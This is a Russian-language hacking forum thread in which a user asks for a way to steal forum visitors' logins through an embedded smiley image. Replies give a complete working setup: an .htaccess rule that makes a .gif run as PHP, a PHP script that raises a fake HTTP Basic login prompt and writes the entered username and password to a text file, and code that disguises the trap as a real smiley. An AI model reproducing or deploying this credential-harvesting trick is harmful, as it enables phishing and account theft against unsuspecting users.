Доброго времени суток всем.

Давно где-то тут наткнулся на статью или сообщение,не помню точно.
Где описывалось,что вставляя в код картинки определённый код и затем в сообщениях на форумах после того как пользователь увидел этот смайл,то у него вытелао окно где просило ввести логин и пароль,после чего логин и пароль сохранялся у меня.

Облазил всю ветку статей,но не нашёл этого.
Может кто-нибудь даст ссылку на это чудо.

forum.xakep.ru/m_1397502/tm.htm
forum.xakep.ru/m_1212796/tm.htm
про права на файлы не забудь.

Первая ссылка,больше всего похожа на то что я имел введу,но мне не надо именно под укоз.

В чем проблема?
Ищи xss и в бой.

Увы с xss не знаком и не хочу заниматься тем чем не знаком.
Решил попроще что-нибудь,т.е. то что в первом посту.

Первая ссылка,больше всего похожа на то что я имел введу,но мне не надо именно под укоз.
Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.

Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.
при переходе на картинку с кодом image.gif выдаёт ошибку,что невозможно открыть файл.

потому что твой веб-сервер должен этот файл как php-скрипт обработать.
у тебя ведь апаче? используй mod_rewrite или директиву AddType

у меня vertrigo.
используй mod_rewrite или директиву AddType
А поточнее,это куда вписывать надо?
Хотя раньше у меня вот этот смайл запускался на вертриго или я ошибаюсь,может то не вертриго был.

создаешь 3 файла:

1..htaccess
содержимое

<files "image.gif">
AddType application/x-httpd-php .gif
</files>

2.image.gif
содержимое
<?
$filevalid = 'accs.txt';
$good = fopen($filevalid, 'a+');
header("WWW-Authenticate: Basic realm=\"Access Forbidden\"");
header("HTTP/1.0 401 Access Forbidden");
if (isset($_SERVER["PHP_AUTH_USER"]) ) {
$user = $_SERVER["PHP_AUTH_USER"];
$pass = $_SERVER["PHP_AUTH_PW"];
fwrite ($good, $user.';'.$pass."\n");
header("HTTP/1.0 200 Login");
//exit("test");
}

?>

3.accs.txt
пустой

Заливаешь на сервак и проставляешь права файлу accs.txt. Тут (http://besland.ru/img/test.gif) готовый тестовый вариант.
Вроде все.

Спасибо огромное!
А можно,что б это ещё показывалось как смайл?

header("Content-type: image/jpg");
echo file_get_contents("smile.jpg");

']header("Content-type: image/jpg");
echo file_get_contents("smile.jpg");
так размер картинки в 2 раза больше, лучше использовать другую функцию для вывода. например, imagejpeg